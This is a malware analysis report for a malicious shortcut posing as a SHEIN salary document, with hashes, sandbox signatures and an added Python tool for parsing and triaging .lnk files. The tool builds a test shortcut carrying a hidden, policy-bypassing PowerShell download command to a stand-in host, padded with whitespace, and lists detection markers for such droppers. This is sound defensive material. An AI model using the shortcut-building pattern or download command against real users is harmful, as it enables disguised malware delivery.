Managed XDR

Dynamic analysis report for the malicious file c-users-user-appdata-l...ontract-terms.docx.lnk

File information

File name: c-users-user-appdata-local-temp-u2tlk1sv.jny-shein_new_collection_lookbook-detailed-description-of-shein-project-salary-with-contract-terms.docx.lnk
File type (file(1) output): MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Sep 11 14:43:34 2025, mtime=Mon Oct 6 21:15:45 2025, atime=Thu Sep 11 14:43:35 2025, length=454656, window=hide
File size: 2.4 KB
First seen:
Last seen:
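The file-type line is a one-line summary of the shortcut's MS-SHLLINK header: the LinkFlags bits (item ID list, LinkInfo, relative path, working directory, command-line arguments), the target's FILETIME stamps and size, and the ShowCommand. The field that matters for triage, the command-line arguments, is exactly the one that summary does not print. The parser below is an added example, not part of this report and not the vendor's tooling: it walks the header, skips the variable-length LinkTargetIDList and LinkInfo structures, decodes the StringData fields and flags what a responder looks for. The input is a constructed shortcut that mirrors the report's header values (flags, ctime/atime/mtime, length=454656); the PowerShell target, its arguments, the icon location and the example.invalid URL are hypothetical, since the report does not show the real command line. I read `window=hide` as ShowCommand 7 (SW_SHOWMINNOACTIVE, start minimised without activating the window); that mapping is my assumption.

```python
import os
import struct
from datetime import datetime, timedelta, timezone

# Structure constants from MS-SHLLINK (Shell Link Binary File Format).
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
FLAG_NAMES = {0x01: "HasLinkTargetIDList", 0x02: "HasLinkInfo", 0x04: "HasName",
              0x08: "HasRelativePath", 0x10: "HasWorkingDir", 0x20: "HasArguments",
              0x40: "HasIconLocation", 0x80: "IsUnicode"}
STRING_DATA = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
               ("arguments", 0x20), ("icon_location", 0x40)]   # fixed on-disk order
SHOW_COMMAND = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
LOLBINS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
           "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec")
DOC_EXTS = {".docx", ".doc", ".pdf", ".xlsx", ".txt", ".jpg", ".png", ".zip"}


def filetime_to_datetime(ft):
    """FILETIME = 100 ns ticks since 1601-01-01 UTC; zero means 'not set'."""
    return None if ft == 0 else FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return 0 if dt is None else int((dt - FILETIME_EPOCH).total_seconds()) * 10_000_000


def parse_lnk(data):
    """Return the header fields plus the StringData section of a shell link."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("bad HeaderSize: not a shell link")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID: not a shell link")
    flags, attrs = struct.unpack_from("<II", data, 20)
    ctime, atime, wtime = struct.unpack_from("<QQQ", data, 28)
    size, icon, show = struct.unpack_from("<IiI", data, 52)   # ShowCommand sits at offset 60
    off = HEADER_SIZE
    if flags & 0x01:   # LinkTargetIDList: IDListSize (2 bytes) + IDList incl. TerminalID
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & 0x02:   # LinkInfo: LinkInfoSize (4 bytes) counts the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    is_unicode = bool(flags & 0x80)
    strings = {}
    for name, bit in STRING_DATA:   # each: CountCharacters (2 bytes) + chars, no terminator
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        nbytes = count * 2 if is_unicode else count
        raw = data[off:off + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {name} string")
        strings[name] = raw.decode("utf-16-le" if is_unicode else "cp1252")
        off += nbytes
    return {"flags": [n for b, n in FLAG_NAMES.items() if flags & b],
            "attributes": attrs, "target_size": size, "icon_index": icon,
            "created": filetime_to_datetime(ctime), "accessed": filetime_to_datetime(atime),
            "modified": filetime_to_datetime(wtime),
            # the spec treats any value other than 1, 3 or 7 as SW_SHOWNORMAL
            "show_command": SHOW_COMMAND.get(show, "SW_SHOWNORMAL"), **strings}


def triage(filename, info):
    """Indicators a responder pulls from a parsed shortcut; returns a list of findings."""
    findings = []
    stem, ext = os.path.splitext(filename.lower())
    if ext == ".lnk" and os.path.splitext(stem)[1] in DOC_EXTS:
        findings.append("double extension disguises the shortcut as a document")
    if info["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("target starts minimised and inactive (file(1) prints window=hide)")
    launched = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    hits = [b for b in LOLBINS if b in launched]
    if hits:
        findings.append("launches " + ", ".join(hits))
    args = info.get("arguments", "")
    if args != args.lstrip():   # padding pushes the real command out of the Properties dialog
        findings.append("arguments padded with leading whitespace")
    for marker in ("-enc", "hidden", "bypass", "http", "iex", "invoke-", "downloadstring"):
        if marker in args.lower():
            findings.append(f"arguments contain {marker!r}")
    return findings


def build_lnk(relative_path, working_dir, arguments, icon_location="", show=7,
              created=None, accessed=None, modified=None, target_size=0):
    """Assemble a minimal well-formed .lnk; used only to make the constructed test input."""
    flags = 0x01 | 0x02 | 0x08 | 0x10 | 0x20 | 0x40 | 0x80
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<II", flags, 0x20)  # Archive
    header += struct.pack("<QQQ", *(datetime_to_filetime(d) for d in (created, accessed, modified)))
    header += struct.pack("<IiIHHII", target_size, 0, show, 0, 0, 0, 0)
    idlist = struct.pack("<HH", 6, 4) + b"\x1f\x00" + b"\x00\x00"  # one dummy ItemID + TerminalID
    linkinfo = struct.pack("<7I", 28, 28, 0, 0, 0, 0, 0)            # empty 28-byte LinkInfo
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, working_dir, arguments, icon_location))
    return header + idlist + linkinfo + strings


# Constructed sample mirroring the report's file(1) fields; the command line is hypothetical.
SAMPLE_NAME = ("c-users-user-appdata-local-temp-u2tlk1sv.jny-shein_new_collection_lookbook-"
               "detailed-description-of-shein-project-salary-with-contract-terms.docx.lnk")
SAMPLE_ARGS = ('-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command '
               '"Invoke-WebRequest https://example.invalid/lookbook -OutFile $env:TEMP\\l.docx"')
SAMPLE_LNK = build_lnk(
    relative_path="..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    working_dir="%TEMP%", arguments="        " + SAMPLE_ARGS,
    icon_location="%SystemRoot%\\System32\\shell32.dll", show=7,
    created=datetime(2025, 9, 11, 14, 43, 34, tzinfo=timezone.utc),
    accessed=datetime(2025, 9, 11, 14, 43, 35, tzinfo=timezone.utc),
    modified=datetime(2025, 10, 6, 21, 15, 45, tzinfo=timezone.utc), target_size=454656)

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    for key, value in info.items():
        print(f"{key:>13}: {value}")
    for finding in triage(SAMPLE_NAME, info):
        print("  !", finding)
```

Run it against a real sample with `parse_lnk(open(path, "rb").read())`. The parser deliberately stops after StringData: the ExtraData blocks that follow (TrackerDataBlock with the source machine's NetBIOS name and MAC-derived GUIDs, EnvironmentVariableDataBlock) are worth a second pass but are not needed to recover the command line.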

Environment

w10/x64 en (Windows 10, 64-bit, English locale)

Hashes

SHA1: 5d6f92b157f2d78746c73b608f0c6ec1ba7d20cc
SHA256: 5a1fad162181f961decd3cb56de98a99eadff3966420dbdc2a463fc5b7f17a25
MD5: a82f88bb88d5c814237bd5fb6fe6424b

Signatures

Resource Development

T1608.005 contacts_url_shortener: Connects to url shortening services

Execution

T1059.001 suspicious_powershell: Creates a suspicious PowerShell process
T1059.001 suspicious_process: Spawns a suspicious process

Privilege Escalation

T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process

Defense Evasion

T1497.003 antisandbox_idletime: Queries the Windows idle time to gauge system uptime
T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process

Discovery

T1497.003 antisandbox_idletime: Queries the Windows idle time to gauge system uptime
T1518 locates_browser: Attempts to identify where browsers are installed

Other

network_powershell: PowerShell process network connection detected
creates_suspended_process: Creates suspended process
test_check_service: Starts services
suricata_alert: Malicious traffic detected
yara_rules: Static YARA rule match